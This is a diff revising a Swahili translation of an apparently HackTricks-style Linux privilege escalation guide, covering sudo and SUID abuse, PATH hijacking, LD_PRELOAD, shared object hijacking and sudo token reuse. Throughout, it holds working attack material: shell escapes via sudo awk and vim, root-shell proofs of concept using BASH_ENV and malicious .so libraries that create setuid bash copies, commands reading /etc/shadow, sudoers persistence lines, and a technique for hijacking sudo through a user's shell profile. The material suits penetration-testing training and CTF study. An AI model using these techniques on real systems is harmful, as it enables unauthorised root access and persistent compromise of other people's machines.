@@ -671,24 +671,24 @@ cat /etc/networks #Files used by network services lsof -i ``` -### Open ports +### Bandari zilizo wazi -Kila wakati angalia huduma za mtandao zinazoendeshwa kwenye mashine ambayo hukuweza kuingiliana nayo kabla ya kuipata: +Daima angalia huduma za mtandao zinazofanya kazi kwenye mashine ambazo hukuweza kuingiliana nazo kabla ya kufikia mashine hiyo: ```bash (netstat -punta || ss --ntpu) (netstat -punta || ss --ntpu) | grep "127.0" ``` ### Sniffing -Angalia kama unaweza sniff traffic. Ikiwa unaweza, unaweza kupata baadhi ya credentials. +Angalia ikiwa unaweza sniff traffic. Ikiwa unaweza, unaweza kuwa na uwezo wa kupata baadhi ya credentials. ``` timeout 1 tcpdump ``` ## Watumiaji -### Uorodheshaji wa Kawaida +### Uorodheshaji wa Kimsingi -Angalia ni **who** wewe ni, ni **privileges** gani ulizonazo, ni **users** gani wako kwenye mfumo, ni yapi wanaoweza **login** na ni nani walio na **root privileges:** +Angalia **nani** wewe ni, ni **privileges** gani unazo, ni **users** gani wako kwenye mfumo, ni zipi zinaweza **login**, na ni zipi zina **root privileges:** ```bash #Info about me id || (whoami && groups) 2>/dev/null 
@@ -712,21 +712,21 @@ gpg --list-keys 2>/dev/null ``` ### UID Kubwa -Baadhi ya toleo za Linux zilikuwa na mdudu unaowawezesha watumiaji wenye **UID > INT_MAX** ku-escalate privileges. Taarifa zaidi: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\ +Baadhi ya matoleo ya Linux yaliathiriwa na mdudu unaowawezesha watumiaji wenye **UID > INT_MAX** kuinua ruhusa. Maelezo zaidi: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) na [here](https://twitter.com/paragonsec/status/1071152249529884674).\ **Exploit it** using: **`systemd-run -t /bin/bash`** -### Makundi +### Vikundi -Angalia ikiwa wewe ni **mwanachama wa kundi fulani** ambacho kinaweza kukupa root privileges: +Angalia kama wewe ni a **mwanachama wa kikundi fulani** ambacho kinaweza kukupa ruhusa za root: {{#ref}} interesting-groups-linux-pe/ {{#endref}} -### Ubao la kunakili +### Clipboard -Angalia kama kuna kitu chochote kinachovutia kipo ndani ya ubao la kunakili (ikiwa inawezekana) +Angalia kama kuna chochote cha kuvutia kilicho ndani ya clipboard (ikiwa inawezekana) ```bash if [ `which xclip 2>/dev/null` ]; then echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` 
@@ -741,29 +741,29 @@ fi ```bash grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs ``` -### Known passwords +### Manenosiri yanayojulikana -Ikiwa **unajua nenosiri lolote** la mazingira, **jaribu kuingia kwa kila mtumiaji** ukitumia nenosiri hilo. +Ikiwa unajua **nenosiri lolote** la mazingira, **jaribu kuingia kama kila mtumiaji** ukitumia nenosiri hilo. ### Su Brute -Ikiwa hautasumbuliwa na kutoa kelele nyingi na binari za `su` na `timeout` ziko kwenye kompyuta, unaweza kujaribu brute-force mtumiaji ukitumia [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\ -[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) kwa parameter ya `-a` pia inajaribu brute-force watumiaji. +Ikiwa haufanyi wasiwasi kuhusu kutoa kelele nyingi na binaries za `su` na `timeout` zipo kwenye kompyuta, unaweza kujaribu ku-brute-force mtumiaji ukitumia [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\ +[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) kwa parameter `-a` pia hujaribu ku-brute-force watumiaji. -## Matumizi mabaya ya PATH +## Matumizi mabaya ya PATH inayoweza kuandikwa ### $PATH -Ikiwa utagundua kuwa unaweza **kuandika ndani ya folda fulani ya $PATH** huenda ukaweza kupandisha haki kwa **kuunda backdoor ndani ya folda inayoweza kuandikwa** kwa jina la amri fulani ambayo itatekelezwa na mtumiaji mwingine (root ikiwa inawezekana) na ambayo **haitapakuliwa kutoka folda iliyoko kabla** ya folda yako inayoweza kuandikwa kwenye $PATH. +Ikiwa ugundua kwamba unaweza **kuandika ndani ya folda fulani ya $PATH** unaweza kuwa unaweza kupandisha vibali kwa **kuunda backdoor ndani ya folda inayoweza kuandikika** kwa jina la amri ambayo itaendeshwa na mtumiaji tofauti (root ikiwezekana) na ambayo **haitapakiwa kutoka kwenye folda iliyoko kabla** ya folda yako inayoweza kuandikika katika $PATH. 
### SUDO and SUID -Unaweza kuruhusiwa kutekeleza amri fulani ukitumia sudo au inaweza kuwa na bit ya suid. Angalia kwa kutumia: +Unaweza kupewa ruhusa kuendesha amri fulani ukitumia sudo au zinaweza kuwa na suid bit. Angalia kwa kutumia: ```bash sudo -l #Check commands you can execute with sudo find / -perm -4000 2>/dev/null #Find all SUID binaries ``` -Baadhi ya **amri zisizotarajiwa zinakuruhusu kusoma na/au kuandika faili au hata kutekeleza amri.** Kwa mfano: +Baadhi ya **amri zisizotarajiwa zinakuwezesha kusoma na/au kuandika faili au hata kutekeleza amri.** Kwa mfano: ```bash sudo awk 'BEGIN {system("/bin/sh")}' sudo find /etc -exec sh -i \; 
@@ -774,36 +774,36 @@ less>! ``` ### NOPASSWD -Usanidi wa Sudo unaweza kumruhusu mtumiaji kutekeleza amri fulani kwa kutumia ruhusa za mtumiaji mwingine bila kujua nenosiri. +Mipangilio ya Sudo yanaweza kumruhusu mtumiaji kutekeleza amri fulani kwa kutumia ruhusa za mtumiaji mwingine bila kujua nywila. ``` $ sudo -l User demo may run the following commands on crashlab: (root) NOPASSWD: /usr/bin/vim ``` -Katika mfano huu mtumiaji `demo` anaweza kuendesha `vim` kama `root`; sasa ni rahisi kupata shell kwa kuongeza ssh key katika root directory au kwa kuendesha `sh`. +Katika mfano huu mtumiaji `demo` anaweza kuendesha `vim` kama `root`, sasa ni rahisi kupata shell kwa kuongeza ufunguo wa `ssh` kwenye saraka ya `root` au kwa kuita `sh`. ``` sudo vim -c '!sh' ``` ### SETENV -Amri hii inamruhusu mtumiaji **kuweka variable ya mazingira** wakati anatekeleza kitu: +Maelekezo haya yanamruhusu mtumiaji **kuweka variable ya mazingira** wakati anatekeleza kitu: ```bash $ sudo -l User waldo may run the following commands on admirer: (ALL) SETENV: /opt/scripts/admin_tasks.sh ``` -Mfano huu, **based on HTB machine Admirer**, ulikuwa **dhaifu** kwa **PYTHONPATH hijacking** kupakia maktaba yoyote ya python wakati script ikitekelezwa kama root: +Mfano huu, **inayotokana na mashine ya HTB Admirer**, ulikuwa **nyeti** kwa **PYTHONPATH hijacking** ambayo iliruhusu kupakia maktaba yeyote ya python wakati script ikiendeshwa kama root: ```bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh ``` ### BASH_ENV imehifadhiwa kupitia sudo env_keep → root shell -Ikiwa sudoers inahifadhi `BASH_ENV` (mfano, `Defaults env_keep+="ENV BASH_ENV"`), unaweza kutumia tabia ya kuanzishwa isiyo ya kiingiliano ya Bash kuendesha code yoyote kama root unapomtumia amri iliyoruhusiwa. +Ikiwa sudoers inahifadhi `BASH_ENV` (mfano, `Defaults env_keep+="ENV BASH_ENV"`), unaweza kutumia tabia ya kuanzisha ya Bash isiyo ya kuingiliana ili kuendesha msimbo wowote kama root unapoita amri inayoruhusiwa. 
-- Kwa nini inafanya kazi: Kwa non-interactive shells, Bash hutathmini `$BASH_ENV` na inasource faili hiyo kabla ya kuendesha script lengwa. Kanuni nyingi za sudo zinaruhusu kuendesha script au shell wrapper. Ikiwa `BASH_ENV` imehifadhiwa na sudo, faili yako itasourced kwa root privileges. +- Kwa nini inafanya kazi: Kwa non-interactive shells, Bash huchambua `$BASH_ENV` na hushirikisha faili hiyo kabla ya kuendesha script lengwa. Kanuni nyingi za sudo zinaruhusu kuendesha script au shell wrapper. Ikiwa `BASH_ENV` imetunzwa na sudo, faili yako inashirikishwa kwa ruhusa za root. - Mahitaji: -- Sudo rule unayoweza kuendesha (target yoyote inayoanzisha `/bin/bash` non-interactively, au script yoyote ya bash). +- Sudo rule unayoweza kuendesha (lengo lolote linaloitaja `/bin/bash` non-interactively, au script yoyote ya bash). - `BASH_ENV` kuwepo katika `env_keep` (angalia kwa `sudo -l`). - PoC: 
@@ -816,14 +816,14 @@ chmod +x /dev/shm/shell.sh BASH_ENV=/dev/shm/shell.sh sudo /usr/bin/systeminfo # or any permitted script/binary that triggers bash # You should now have a root shell ``` -- Kukaza usalama: -- Ondoa `BASH_ENV` (na `ENV`) kutoka `env_keep`, tumia `env_reset`. -- Epuka wrapper za shell kwa amri zinazoruhusiwa na sudo; tumia binaries ndogo. -- Zingatia logging ya sudo I/O na alerting wakati env vars zilizohifadhiwa zinapotumika. +- Kuimarisha: +- Ondoa `BASH_ENV` (na `ENV`) kutoka `env_keep`, badala yake tumia `env_reset`. +- Epuka shell wrappers kwa amri zinazoruhusiwa na sudo; tumia minimal binaries. +- Fikiria sudo I/O logging na alerting wakati preserved env vars zinapotumika. -### Njia za bypassing za utekelezaji wa sudo +### Njia za bypassing utekelezaji wa sudo -**Ruka** kusoma faili nyingine au tumia **symlinks**. Kwa mfano kwenye faili ya sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_ +**Ruka** kusoma faili nyingine au tumia **symlinks**. Kwa mfano katika faili ya sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_ ```bash sudo less /var/logs/anything less>:e /etc/shadow #Jump to read other files using privileged less @@ -833,7 +833,7 @@ less>:e /etc/shadow #Jump to read other files using privileged less ln /etc/shadow /var/log/new sudo less /var/log/new #Use symlinks to read any file ``` -Ikiwa **wildcard** inapotumika (\*), ni rahisi hata zaidi: +Ikiwa **wildcard** imetumika (\*), ni rahisi zaidi: ```bash sudo less /var/log/../../etc/shadow #Read shadow sudo less /var/log/something /etc/shadow #Red 2 files 
@@ -842,37 +842,37 @@ sudo less /var/log/something /etc/shadow #Red 2 files ### Sudo command/SUID binary bila njia ya amri -Ikiwa **sudo permission** imetolewa kwa amri moja tu **bila kutaja njia ya amri**: _hacker10 ALL= (root) less_ unaweza kuiexploit kwa kubadilisha PATH variable +Iwapo **sudo permission** imetolewa kwa amri moja **bila kubainisha njia**: _hacker10 ALL= (root) less_ unaweza ku-exploit kwa kubadilisha variable ya PATH. ```bash export PATH=/tmp:$PATH #Put your backdoor in /tmp and name it "less" sudo less ``` -Mbinu hii pia inaweza kutumika ikiwa **suid** binary **inatekeleza amri nyingine bila kutaja njia yake (hakikisha kila wakati kwa kutumia** _**strings**_ **yaliyomo ya binary isiyo ya kawaida ya SUID)**. +Njia hii pia inaweza kutumika ikiwa binary ya **suid** **inatekeleza amri nyingine bila kutaja path yake (daima angalia kwa** _**strings**_ **maudhui ya binary ya SUID isiyo ya kawaida)**). [Payload examples to execute.](payloads-to-execute.md) -### SUID binary yenye njia ya amri +### SUID binary na command path -Ikiwa binary ya **suid** **inatekeleza amri nyingine kwa kutaja njia**, basi unaweza kujaribu **export a function** iitwayo kama amri ambayo faili ya suid inaiita. +Ikiwa binary ya **suid** **inatekeleza amri nyingine kwa kutaja path**, basi, unaweza kujaribu **export a function** iitwayo kwa jina la amri ambayo faili ya suid inaiita. 
-Kwa mfano, ikiwa binary ya suid inaita _**/usr/sbin/service apache2 start**_ unapaswa kujaribu kuunda function hiyo na kui-export: +Kwa mfano, ikiwa binary ya suid inaita _**/usr/sbin/service apache2 start**_ you have to try to create the function and export it: ```bash function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } export -f /usr/sbin/service ``` -Kisha, unapoiita binary ya suid, kazi hii itaendeshwa +Kisha, unapoita suid binary, funsi hii itaendeshwa ### LD_PRELOAD & **LD_LIBRARY_PATH** -Kigezo cha mazingira **LD_PRELOAD** kinatumika kubainisha maktaba moja au zaidi za pamoja (.so files) ambazo loader itapakia kabla ya nyingine zote, ikiwemo maktaba ya kawaida ya C (`libc.so`). Mchakato huu unajulikana kama preloading ya maktaba. +The **LD_PRELOAD** environment variable is used to specify one or more shared libraries (.so files) to be loaded by the loader before all others, including the standard C library (`libc.so`). This process is known as preloading a library. -Hata hivyo, ili kudumisha usalama wa mfumo na kuzuia kipengele hiki kutumika vibaya, hasa kwa ejecutables za **suid/sgid**, mfumo unatekeleza masharti fulani: +Hata hivyo, ili kudumisha usalama wa mfumo na kuzuia kipengele hiki kutumiwa vibaya, hasa kwa executables za **suid/sgid**, mfumo unaweka masharti fulani: -- Loader haizingatii **LD_PRELOAD** kwa executables ambapo real user ID (_ruid_) haifanani na effective user ID (_euid_). -- Kwa executables za **suid/sgid**, maktaba hupakiwa kabla tu ikiwa zipo katika njia za kawaida ambazo pia zimetengwa kama suid/sgid. +- The loader disregards **LD_PRELOAD** for executables where the real user ID (_ruid_) does not match the effective user ID (_euid_). +- For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded. -Privilege escalation inaweza kutokea ikiwa una uwezo wa kutekeleza amri kwa `sudo` na matokeo ya `sudo -l` yanajumuisha taarifa **env_keep+=LD_PRELOAD**. 
Mpangilio huu unaruhusu kigezo cha mazingira **LD_PRELOAD** kubaki na kutambuliwa hata wakati amri zinapofanywa kwa `sudo`, jambo linaloweza kusababisha utekelezwaji wa arbitrary code kwa elevated privileges. +Privilege escalation can occur if you have the ability to execute commands with `sudo` and the output of `sudo -l` includes the statement **env_keep+=LD_PRELOAD**. This configuration allows the **LD_PRELOAD** environment variable to persist and be recognized even when commands are run with `sudo`, potentially leading to the execution of arbitrary code with elevated privileges. ``` Defaults env_keep += LD_PRELOAD ``` @@ -894,12 +894,12 @@ Kisha **compile it** ukitumia: cd /tmp gcc -fPIC -shared -o pe.so pe.c -nostartfiles ``` -Hatimaye, **escalate privileges** ukiendesha +Mwishowe, **escalate privileges** ukiendesha ```bash sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo ``` > [!CAUTION] -> Privesc sawa inaweza kutumiwa vibaya ikiwa mshambuliaji anadhibiti kigezo cha mazingira **LD_LIBRARY_PATH** kwa sababu anadhibiti njia ambapo maktaba zitatafutwa. +> Privesc sawa inaweza kutumika vibaya ikiwa mshambulizi anadhibiti **LD_LIBRARY_PATH** env variable kwa sababu anadhibiti njia ambapo libraries zitatafutwa. ```c #include #include 
@@ -921,13 +921,13 @@ sudo LD_LIBRARY_PATH=/tmp ``` ### SUID Binary – .so injection -Unapotokea kuwa na binary yenye ruhusa za **SUID** ambazo zinaonekana zisizo za kawaida, ni mazoea mazuri kuthibitisha kama inapakia faili za **.so** ipasavyo. Hii inaweza kuthibitishwa kwa kuendesha amri ifuatayo: +Unapokutana na binary yenye ruhusa za **SUID** ambazo zinaonekana zisizo za kawaida, ni desturi nzuri kuthibitisha kama inapakia faili za **.so** ipasavyo. Hii inaweza kukaguliwa kwa kuendesha amri ifuatayo: ```bash strace 2>&1 | grep -i -E "open|access|no such file" ``` -Kwa mfano, kukutana na hitilafu kama _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ kunapendekeza uwezekano wa exploitation. +Kwa mfano, kupata hitilafu kama _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ kunaonyesha uwezekano wa exploitation. -Ili exploit hii, mtu angeendelea kwa kuunda faili ya C, kwa mfano _"/path/to/.config/libcalc.c"_, lenye msimbo ufuatao: +Ili exploit hii, mtu angeendelea kwa kuunda faili ya C, sema _"/path/to/.config/libcalc.c"_, yenye msimbo ufuatao: ```c #include #include 
@@ -938,13 +938,13 @@ void inject(){ system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } ``` -Msimbo huu, mara ukisanywa na kutekelezwa, unalenga kuinua vibali kwa kubadilisha ruhusa za faili na kuendesha shell yenye vibali vilivyoongezwa. +Msimbo huu, mara tu ukichanganuliwa (compiled) na kutekelezwa (executed), unalenga kuongeza privileges kwa kubadilisha ruhusa za faili na kutekeleza shell yenye privileges zilizoinuliwa. -Kusanya C file hapo juu kuwa shared object (.so) file kwa: +Tengeneza (compile) C file iliyotajwa juu kuwa shared object (.so) file kwa kutumia: ```bash gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c ``` -Hatimaye, kuendesha SUID binary iliyokumbwa kunapaswa kuanzisha exploit, kuruhusu uwezekano wa kuvamiwa au kuvunjika kwa usalama wa mfumo. +Hatimaye, kuendesha SUID binary iliyoharibika kunapaswa kuchochea exploit, kuruhusu uwezekano wa kuvunjwa kwa usalama wa mfumo. ## Shared Object Hijacking ```bash @@ -956,7 +956,7 @@ something.so => /lib/x86_64-linux-gnu/something.so readelf -d payroll | grep PATH 0x000000000000001d (RUNPATH) Library runpath: [/development] ``` -Sasa tumeipata SUID binary inayo-load library kutoka kwa folder ambamo tunaweza kuandika, hebu tuunde library katika folder hiyo kwa jina linalohitajika: +Sasa tunapokuwa tumepata SUID binary inayopakia library kutoka kwenye folda tunaoweza kuandika, hebu tuunde library katika folda hiyo kwa jina linalohitajika: ```c //gcc src.c -fPIC -shared -o /development/libshared.so #include @@ -969,7 +969,7 @@ setresuid(0,0,0); system("/bin/bash -p"); } ``` -Ikiwa unapata hitilafu kama +Ikiwa unapata hitilafu kama vile ```shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name ``` 
@@ -977,9 +977,9 @@ hii inamaanisha kwamba maktaba uliyotengeneza inahitaji kuwa na function inayoit ### GTFOBins -[**GTFOBins**](https://gtfobins.github.io) ni orodha iliyochaguliwa ya Unix binaries ambazo zinaweza kutumiwa na mshambuliaji kuvuka vikwazo vya usalama vya kienyeji. [**GTFOArgs**](https://gtfoargs.github.io/) ni sawa lakini kwa kesi ambapo unaweza **kuingiza hoja tu** kwenye amri. +[**GTFOBins**](https://gtfobins.github.io) ni orodha iliyochaguliwa ya Unix binaries ambazo zinaweza kutumiwa na mshambuliaji kuvuka vikwazo vya usalama vya eneo. [**GTFOArgs**](https://gtfoargs.github.io/) ni sawa lakini kwa kesi ambapo unaweza **kuingiza vigezo tu** katika amri. -Mradi huu hukusanya function halali za Unix binaries ambazo zinaweza kutumiwa vibaya kutoroka restricted shells, kuongeza au kudumisha elevated privileges, kuhamisha faili, kuzalisha bind na reverse shells, na kurahisisha kazi nyingine za post-exploitation. +Mradi unakusanya kazi halali za Unix binaries ambazo zinaweza kutumika vibaya kuvunja restricted shells, kuongeza au kudumisha elevated privileges, kuhamisha files, kuzalisha bind na reverse shells, na kurahisisha kazi zingine za post-exploitation. > gdb -nx -ex '!sh' -ex quit\ > sudo mysql -e '! /bin/sh'\ 
@@ -998,50 +998,50 @@ https://gtfoargs.github.io/ ### FallOfSudo -Ikiwa unaweza kufikia `sudo -l` unaweza kutumia zana [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) kukagua ikiwa inapata njia ya ku-exploit sheria yoyote ya sudo. +If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) to check if it finds how to exploit any sudo rule. -### Kutumia tena Sudo Tokens +### Reusing Sudo Tokens -Katika kesi ambapo una **sudo access** lakini huna nywila, unaweza kuongeza privileges kwa **kusubiri utekelezaji wa amri ya sudo kisha uiba token ya session**. +Katika matukio ambapo una **sudo access** lakini huna nenosiri, unaweza kuongeza privileges kwa **kusubiri utekelezaji wa amri ya sudo kisha ku-hijack session token**. Mahitaji ya kuongeza privileges: - Tayari una shell kama mtumiaji "_sampleuser_" -- "_sampleuser_" ame **tumia `sudo`** kutekeleza kitu katika **dakika 15 zilizopita** (kwa default hiyo ndio muda wa sudo token unaoturuhusu kutumia `sudo` bila kuingiza nywila yoyote) +- "_sampleuser_" ame **tumia `sudo`** kutekeleza kitu katika **dakika 15 zilizopita** (kwa default hiyo ndiyo muda wa sudo token unaoturuhusu kutumia `sudo` bila kuingiza nenosiri) - `cat /proc/sys/kernel/yama/ptrace_scope` ni 0 -- `gdb` inapatikana (uweze kuipakia) +- `gdb` inapatikana (unaweza kuiweka/upload) -(Unaweza kwa muda kuwezesha `ptrace_scope` kwa `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` au kwa kudumu kubadilisha `/etc/sysctl.d/10-ptrace.conf` na kuweka `kernel.yama.ptrace_scope = 0`) +(Unaweza kwa muda kuwezesha `ptrace_scope` kwa kutumia `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` au kwa kudumu kubadilisha `/etc/sysctl.d/10-ptrace.conf` na kuweka `kernel.yama.ptrace_scope = 0`) -Iki mahitaji haya yote yakitimizwa, **unaweza kuongeza privileges kwa kutumia:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject) +Ikiwa mahitaji yote yamekamilika, 
**uweza kuongeza privileges kwa kutumia:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject) -- The **first exploit** (`exploit.sh`) itaumba binary `activate_sudo_token` katika _/tmp_. Unaweza kuitumia **kuamsha sudo token kwenye session yako** (hutapokea moja kwa moja root shell, fanya `sudo su`): +- The **first exploit** (`exploit.sh`) will create the binary `activate_sudo_token` in _/tmp_. Unaweza kuitumia **kuactivate the sudo token in your session** (hautapata moja kwa moja root shell, fanya `sudo su`): ```bash bash exploit.sh /tmp/activate_sudo_token sudo su ``` -- **exploit ya pili** (`exploit_v2.sh`) itaunda sh shell katika _/tmp_ **inayomilikiwa na root yenye setuid** +- **exploit ya pili** (`exploit_v2.sh`) itaunda sh shell katika _/tmp_ **inamilikiwa na root yenye setuid** ```bash bash exploit_v2.sh /tmp/sh -p ``` -- **exploit ya tatu** (`exploit_v3.sh`) itaunda **sudoers file** ambayo inafanya **sudo tokens kuwa za milele na kuruhusu watumiaji wote kutumia sudo** +- **exploit ya tatu** (`exploit_v3.sh`) **itaunda faili ya sudoers** ambayo inafanya **sudo tokens** kuwa ya milele na kuwawezesha watumiaji wote kutumia **sudo** ```bash bash exploit_v3.sh sudo su ``` ### /var/run/sudo/ts/\ -Ikiwa una **write permissions** katika kabrasha au kwenye yoyote ya faili zilizotengenezwa ndani ya kabrasha unaweza kutumia binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) ili **kuunda sudo token kwa user na PID**.\ -Kwa mfano, ikiwa unaweza kuandika upya faili _/var/run/sudo/ts/sampleuser_ na una shell kama user huyo mwenye PID 1234, unaweza **obtain sudo privileges** bila kuhitaji kujua password kwa kufanya: +Kama una **ruhusa za kuandika** kwenye folda au kwenye yoyote ya faili zilizotengenezwa ndani ya folda unaweza kutumia binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) ku**unda token ya sudo kwa mtumiaji na PID**.\ +Kwa mfano, ikiwa 
unaweza kuandika juu ya faili _/var/run/sudo/ts/sampleuser_ na una shell kama mtumiaji huyo mwenye PID 1234, unaweza **kupata ruhusa za sudo** bila ya kuhitaji kujua password kwa kufanya: ```bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser ``` ### /etc/sudoers, /etc/sudoers.d -Faili `/etc/sudoers` na faili zilizo ndani ya `/etc/sudoers.d` zinaamua nani anaweza kutumia `sudo` na jinsi. Faili hizi **kwa chaguo-msingi zinaweza kusomwa tu na mtumiaji root na kikundi root**.\ -**Ikiwa** unaweza **kusoma** faili hii unaweza kuwa na uwezo wa **kupata taarifa za kuvutia**, na ikiwa unaweza **kuandika** faili yoyote utaweza **kupandisha ruhusa**. +The file `/etc/sudoers` and the files inside `/etc/sudoers.d` configure who can use `sudo` and how. These files **kwa chaguo-msingi zinaweza kusomwa tu na mtumiaji root na kundi root**.\ +**Ikiwa** unaweza **kusoma** faili hii unaweza kuwa na uwezo wa **kupata taarifa za kuvutia**, na ikiwa unaweza **kuandika** faili yoyote utaweza **escalate privileges**. ```bash ls -l /etc/sudoers /etc/sudoers.d/ ls -ld /etc/sudoers.d/ 
@@ -1060,15 +1060,15 @@ echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win ``` ### DOAS -Kuna baadhi ya mbadala kwa binary ya `sudo` kama `doas` kwa OpenBSD, kumbuka kuangalia usanidi wake kwenye `/etc/doas.conf` +Kuna baadhi ya mbadala kwa binary ya `sudo` kama `doas` kwa OpenBSD, kumbuka kuangalia usanidi wake katika `/etc/doas.conf` ``` permit nopass demo as root cmd vim ``` ### Sudo Hijacking -Ikiwa unajua kwamba mtumiaji kwa kawaida huungana kwenye mashine na hutumia `sudo` kuongeza ruhusa na umepata shell ndani ya muktadha wa mtumiaji huyo, unaweza **kuunda executable mpya ya sudo** itakayotekeleza msimbo wako kama root kisha amri ya mtumiaji. Kisha, **badilisha $PATH** ya muktadha wa mtumiaji (kwa mfano kwa kuongeza path mpya katika .bash_profile) ili wakati mtumiaji anapotekeleza sudo, executable yako ya sudo itatekelezwa. +Ikiwa unajua kwamba **mtumiaji kawaida huunganishwa kwenye mashine na hutumia `sudo`** ili kuongeza ruhusa na umepata shell ndani ya muktadha wa mtumiaji huyo, unaweza **kutengeneza executable mpya ya sudo** ambayo itatekeleza msimbo wako kama root kisha amri ya mtumiaji. Kisha, **badilisha $PATH** ya muktadha wa mtumiaji (kwa mfano kwa kuingiza njia mpya katika .bash_profile) ili anapotekeleza sudo, executable yako ya sudo itatekelezwa. -Kumbuka kwamba ikiwa mtumiaji anatumia shell tofauti (si bash) utahitaji kubadilisha faili nyingine ili kuongeza path mpya. Kwa mfano [sudo-piggyback](https://github.com/APTy/sudo-piggyback) inabadilisha `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Unaweza kupata mfano mwingine katika [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py) +Kumbuka kwamba ikiwa mtumiaji anatumia shell tofauti (si bash) utahitaji kubadilisha faili nyingine ili kuongeza njia mpya. Kwa mfano[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) inabadilisha `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. 
Unaweza kupata mfano mwingine katika [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py) Au kuendesha kitu kama: ```bash @@ -1089,12 +1089,13 @@ sudo ls ### ld.so -Faili `/etc/ld.so.conf` inaonyesha **mahali mafaili ya usanidi yaliyosomwa yanapotoka**. Kawaida, faili hii ina njia ifuatayo: `include /etc/ld.so.conf.d/*.conf` +The file `/etc/ld.so.conf` indicates **kutoka wapi faili za usanidi zilizosomwa**. Typically, this file contains the following path: `include /etc/ld.so.conf.d/*.conf` -Hii ina maana kwamba mafaili ya usanidi kutoka `/etc/ld.so.conf.d/*.conf` yatasomwa. Mafaili haya ya usanidi **yanaelekeza kwenye folda nyingine** ambapo **libraries** **zitatafutwa**. Kwa mfano, maudhui ya `/etc/ld.so.conf.d/libc.conf` ni `/usr/local/lib`. **Hii inamaanisha kwamba mfumo utatafuta libraries ndani ya `/usr/local/lib`**. +That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be read. This configuration files **zinaonyesha folda nyingine** ambapo **maktaba** zitakuwa **zikitafutwa**. For example, the content of `/etc/ld.so.conf.d/libc.conf` is `/usr/local/lib`. **Hii ina maana kwamba mfumo utatafuta maktaba ndani ya `/usr/local/lib`**. + +If for some reason **mtumiaji ana ruhusa za kuandika** on any of the paths indicated: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, any file inside `/etc/ld.so.conf.d/` or any folder within the config file inside `/etc/ld.so.conf.d/*.conf` he may be able to escalate privileges.\ +Tazama **jinsi ya kufaidi usanidi huu usio sahihi** kwenye ukurasa ufuatao: -Ikiwa kwa sababu fulani **mtumiaji ana ruhusa ya kuandika** kwenye mojawapo ya njia zilizoonyeshwa: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, faili yoyote ndani ya `/etc/ld.so.conf.d/` au folder yoyote ndani ya faili za usanidi ndani ya `/etc/ld.so.conf.d/*.conf` anaweza kuwa na uwezo wa escalate privileges.\ -Angalia **how to exploit this misconfiguration** katika ukurasa ufuatao: {{#ref}} ld.so.conf-example.md 
@@ -1111,7 +1112,7 @@ linux-gate.so.1 => (0x0068c000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) /lib/ld-linux.so.2 (0x005bb000) ``` -Kwa kunakili lib kwenye `/var/tmp/flag15/`, itatumika na programu mahali hapa kama ilivyoainishwa katika kigezo cha `RPATH`. +Kwa kunakili lib ndani ya `/var/tmp/flag15/` itatumika na programu mahali hapa kama ilivyoainishwa katika thamani ya `RPATH`. ``` level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ @@ -1120,7 +1121,7 @@ linux-gate.so.1 => (0x005b0000) libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) /lib/ld-linux.so.2 (0x00737000) ``` -Kisha tengeneza maktaba mbaya katika `/var/tmp` kwa kutumia `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` +Kisha tengeneza maktaba ya uovu katika `/var/tmp` kwa kutumia `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` ```c #include #define SHELL "/bin/sh" 
